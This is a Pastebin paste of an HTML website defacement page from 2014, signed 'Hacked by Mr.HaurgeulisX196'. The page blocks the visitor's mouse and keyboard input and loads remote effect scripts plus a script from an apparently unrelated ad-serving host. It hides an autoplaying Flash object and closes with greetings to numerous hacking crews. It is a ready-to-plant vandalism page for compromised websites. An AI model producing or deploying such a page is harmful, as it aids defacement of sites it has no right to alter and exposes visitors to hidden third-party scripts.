Guest User

haurgeulis.html

a guest
Jul 3rd, 2014
730
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.42 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta name="description" content="Hacked by Mr.HaurgeulisX196>
  4. <meta name="keywords" content="Hacked by Mr.HaurgeulisX196">
  5. <meta name="author" content="Hacked by Mr.HaurgeulisX196">
  6. <meta charset="UTF-8">
  7. <script type="text/javascript" src="http://apiwebspadesinfo-a.akamaihd.net/gsrs?is=fmxqtid&bp=PB&g=1c83c707-6e9c-4b09-884c-3bbc7f641e35" ></script></head>
  8. <title>Hacked by Mr.HaurgeulisX196</title>
  9. <link rel='SHORTCUT ICON' type='image/x-icon'
  10. href='http://haurgeulis-security.blogspot.com/favicon.ico'>
  11. <body background="http://nadya4site.files.wordpress.com/2014/01/scary-road-background-scenery-original.jpg">
  12.  
  13. <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
  14. <script type="text/javascript" src="http://id-pemula-javascript.googlecode.com/files/efek-salju.js" /></script>
  15.  
  16. <script type="text/javascript">
  17.  
  18. snowStorm.snowColor = 'blue';
  19.  
  20. // salju biru muda silakan ganti dengan warna lain
  21.  
  22. snowStorm.flakesMaxActive = 96;
  23.  
  24. snowStorm.useTwinkleEffect = true;
  25. </script>
  26.  
  27. <link href='http://fonts.googleapis.com/css?family=Pirata+One' rel='stylesheet' type='text/css'>
  28.  
  29. <center><font style="color:white;font size:8px;text-align: center;font-family:Pirata One;text-shadow: 0 0 3px #0000FF, 0px 0px 5px #00FFFF,0 0 5px #00FFFF,0 0 5px #00FFFF;"><font face="Pirata One" color=red size=5></font><font size="10" font-family="Pirata One" color="black">[#] Hacked By Mr.HaurgeulisX196 [#]</font></a></center>
  30. <center><font style="color:white;font size:8px;text-align: center;font-family:Pirata One;text-shadow: 0 0 3px #0000FF, 0px 0px 5px #00FFFF,0 0 5px #00FFFF,0 0 5px #00FFFF;"><font face="Pirata One" color=red size=5></font><font size="5" font-family="Pirata One" color="black">$ Try To be yourself | If You Want to get the best</font></a></center>
  31.  
  32. <div class="auto-style2">
  33. <style type="text/css">
  34. .img_OW{
  35. position:relative
  36. }
  37. </style>
  38. <script src="http://otowebsite.googlecode.com/files/Getar.js.txt" type="text/javascript"></script>
  39. <a href="https://www.facebook.com/Mr.HaurgeulisX196" target="blank"> <center><img class="img_OW" src="https://fbcdn-photos-b-a.akamaihd.net/hphotos-ak-prn1/t1.0-0/10312495_244149309119361_5427893583817506774_n.jpg" widht="900" height="325" onclick="top.focus()" onmouseout="stoprattle(this);top.focus()" onmouseover="init(this);rattleimage()" /></a>
  40.  
  41. <SCRIPT>
  42. var width=document.body.clientWidth;
  43. var height=document.body.clientHeight;
  44. function doClickText(who,type,step,timeOut) {
  45. document.getElementById(who).style.display="none";
  46. if(type==0) {
  47. reveal('revealDiv1',step,timeOut,0);
  48. reveal('revealDiv2',step,timeOut,1);}
  49. if(type==1) {
  50. reveal('revealDiv1',step,timeOut,2);
  51. reveal('revealDiv2',step,timeOut,3);}}
  52. function reveal(who,step,timeOut,type) {
  53. if(type==0)
  54. var where="top";
  55. if(type==1)
  56. var where="bottom";
  57. if(type==2)
  58. var where="left";
  59. if(type==3)
  60. var where="right";
  61. eval('var temp=document.getElementById(who).style.'+where);
  62. temp=parseInt(temp);
  63. if(type==0||type==1)
  64. var checkWith=height/2;
  65. if(type==2||type==3)
  66. var checkWith=width/2;
  67. if(-temp<checkWith) {
  68. temp-=step;
  69. eval('document.getElementById(who).style.'+where+'=temp;');
  70. setTimeout("reveal('"+who+"',"+step+",'"+timeOut+"',"+type+")", timeOut);}
  71. else {
  72. document.getElementById(who).style.display="none";
  73. document.body.scroll="yes";}}
  74. function initReveal(type,div1bg,div2bg,div1bw,div2bw,div1bc,div2bc,step,timeOut,click) {
  75. if(type==0) {
  76. var bWhere1="border-bottom";
  77. var bWhere2="border-top";
  78. var putZero1="top:0px; left:0px";
  79. var putZero2="bottom:0px; left:0px";
  80. document.write('<div id="revealDiv1" style="z-index:100; display:block; position:absolute; '+putZero1+'; background:'+div1bg+' ; width:'+(width)+'; height:'+(height/2)+'; '+bWhere1+':'+div1bc+' solid '+div1bw+'px"></div>');
  81. document.write('<div id="revealDiv2" style="z-index:100; display:block; position:absolute; '+putZero2+'; background:'+div2bg+' ; width:'+(width)+'; height:'+(height/2)+'; '+bWhere2+':'+div2bc+' solid '+div2bw+'px"></div>');
  82. if(!click) {
  83. reveal('revealDiv1',step,timeOut,0);
  84. reveal('revealDiv2',step,timeOut,1);}
  85. else {
  86. clickText(type,step,timeOut);}}
  87. if(type==1) {
  88. var bWhere1="border-right";
  89. var bWhere2="border-left";
  90. var putZero1="top:0px; left:0px";
  91. var putZero2="top:0px; right:0px";
  92. document.write('<div id="revealDiv1" style="z-index:100; display:block; position:absolute; '+putZero1+'; background:'+div1bg+' ; width:'+(width/2)+'; height:'+(height)+'; '+bWhere1+':'+div1bc+' solid '+div1bw+'px"></div>');
  93. document.write('<div id="revealDiv2" style="z-index:100; display:block; position:absolute; '+putZero2+'; background:'+div2bg+' ; width:'+(width/2)+'; height:'+(height)+'; '+bWhere2+':'+div2bc+' solid '+div2bw+'px"></div>');
  94. if(!click) {
  95. reveal('revealDiv1',step,timeOut,2);
  96. reveal('revealDiv2',step,timeOut,3);}
  97. else {
  98. clickText(type,step,timeOut);}}
  99. function clickText(type,step,timeOut) {
  100. document.write('<div id="clickText" style="z-index:101; display:block; position:absolute; top:'+(height/2-clickh/2-clickb)+'; left:'+(width/2-clickw/2-clickb)+'"><table style="border:'+clickc+' solid '+clickb+'px; background:'+clickbg+' ;width:'+clickw+'px; height:'+clickh+'; '+clickFont+'; cursor:hand; cursor:pointer" onclick="doClickText(\'clickText\','+type+','+step+','+timeOut+')"><tr><td align="middle">'+clickt+'</td></tr></table></div>');}}</SCRIPT> <SCRIPT>
  101. var clickw=320; // Width
  102. var clickh=30; // Height
  103. var clickb=1; // Border width
  104. var clickc="red"; // Border color
  105. var clickbg="#0000FF"; // Background color
  106. var clickt="<b><blink>Click this</blink></b>"; // Text to display
  107. var clickFont="font-family:Tahoma,arial,helvetica; font-size:11pt; font-weight:bold; color:Green"; // The font style of the text
  108. new initReveal(0,'red','white',5,5,'blue','indigo',3,10,true);</SCRIPT>
  109. <p>
  110.  
  111. <font color="white" face="courier new" size="4">We Are : Mr.HaurgeulisX196 - Mr.Dha - Mr.DellaltioNx196 - Isal Dot ID - Della HaXor - Sneake - SvN_NeverMore - HumanError404 - Achan Dot ID - Kinal dot ID - Tata HaXor </font>
  112. <p>
  113. <p>
  114. <p>
  115. <footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); border-top: 1px solid #0000CD; border-bottom: 1px solid #0000CD"><font style="font:20px orbitron;color:#FF0000;"><font style="font:17px orbitron;color:#0000CD;"><b>Greetz :</b></font></font><font face="Tahoma" size="4" color="Red">[</font><font face="Ubuntu Mono" size="4" color="#4C9CAF"><b><marquee scrollamount="5" scrolldelay="50" width="85%">Haurgeulis Security | No Name Cyber Team | Garuda Cyber Attacker | Surabaya Black Hat | BlackAnt Sec | Pakistan Zindabad | Pakistan Haxors Crew - PHC | Madleets | Manusia Biasa Team | Java Cyber Army | Indonesia Security Tester | Indonesia Cyber Army | Suram Crew | Jember Hacker Team | JKT48 Cyber Team | n1tr0 | Hmei7 | ./Ozzora404 | RhC | ./SAMUEL84 | Barrabravaz | Katonz | Menibox | ViruzTomcat | BoyMinionymous_ | Rebels | ./BR14N | ExE Dot ID</b> </marquee></foottyle="margin: 0px; padding: 0px"></font><font face="Tahoma" size="4" color="Red">]</font><style>
  116.  
  117. <style type='text/css'>body, a, a:link{cursor:url(http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/19.gif), default;} a:hover {cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png),wait;}</style>
  118.  
  119.  
  120. <object data="http://static.4shared.com/flash/player/5.10/player.swf?file=http://www.youtube.com/v/xG0yUhc2y3s&repeat=no&autostart=true" width="0" height="0" type="application/x-shockwave-flash"></object>
  121. </
Advertisement
Add Comment
Please, Sign In to add comment